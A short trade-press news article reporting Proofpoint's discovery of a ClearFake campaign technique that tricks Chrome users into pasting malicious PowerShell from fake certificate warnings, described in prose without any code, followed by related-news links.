Proofpoint uncovers social engineering technique

Proofpoint Inc.

By Dylan Bushell-Embling
Monday, 24 June, 2024
Proofpoint uncovers social engineering technique

Proofpoint has uncovered a new social engineering technique attempting to coerce victims into copy and pasting malicious PowerShell scripts to infect their computers with malware.

The technique targets users of Google’s popular Chrome web browser. It has been observed as early as 1 March by the ClearFake attack campaign. ClearFake is a fake browser update activity cluster that compromises legitimate websites with malicious HTML and JavaScript.

As part of the technique, when a user visits a compromised website, they are presented with a fake warning overlay prompting them to install a ‘root certificate’ to be able to properly access the page. The message includes a button that copies code into the user’s cache and instructs them to open a PowerShell window, paste the malicious code and run it, Proofpoint said.

In the attack campaign observed by Proofpoint in May, the malicious code performed functions that can include flushing the DNS cache, removing clipboard content, displaying a decoy message to the user and downloading a remote PowerShell script and executing it in-memory.

The remote PowerShell script was used to download another PowerShell script, which itself obtained system temperatures as a check against virtual environments and sandboxes, and if none are found downloads a fourth PowerShell script that downloads a file named data.zip, extracts the content to find any .exe files.

This method was then used to download payloads including cryptocurrency minors, as well as a clipboard hijacker designed to replace cryptocurrency addresses in the clipboard with threat actor-controlled addresses.

“The attack chain is unique and aligns with the overall trend Proofpoint has observed of cybercriminal threat actors adopting new, varied and increasingly creative attack chains,” Proofpoint researchers said in a threat advisory. “Organisations should train users to identify the activity and report suspicious activity to their security teams. This is very specific training but can easily be integrated into an existing user training program.”

Top image credit: iStock.com/BeeBright

Related News

CSO Group and xAmplify announce merger

CSO Group and xAmplify will merge to create what they say will be Australia's largest...

Study finds five markers of cyber maturity

A survey commissioned by Commvault has identified five key capabilities commonly shared by...

Lack of leadership buy-in biggest obstacle to digital trust: report

A new report from ISACA says that many organisations say that in five years digital trust will be...

Content from other channels on our network

Aust–US partnership brings large-scale mobile battery solutions to APAC

$40K fine for electrical licence-sharing scheme

$100m global challenge for ultra-low-cost solar

ASEAN telcos collaborate on next-gen Malaysian data centre

Interconnected microgrids: the way of the future?

Vic Govt providing affordable renewable energy

Strengthening the Aged Care Quality and Safety Commission

Bridging the essential awareness gap to protect the APS

Lumify Group launches e-learning division

Inaction towards human-centred design is no longer an option

Enhancing Advatek Lighting's business operations with a Hawker Richardson total line solution

Wirelessly powered relay brings 5G tech to smart factories

Strategy developed for 'self-healing' solar cells

Novel method to get efficient, environmentally friendly lithium

A TED Talk in thermo detection

  • All content Copyright © 2024 Westwick-Farrow Pty Ltd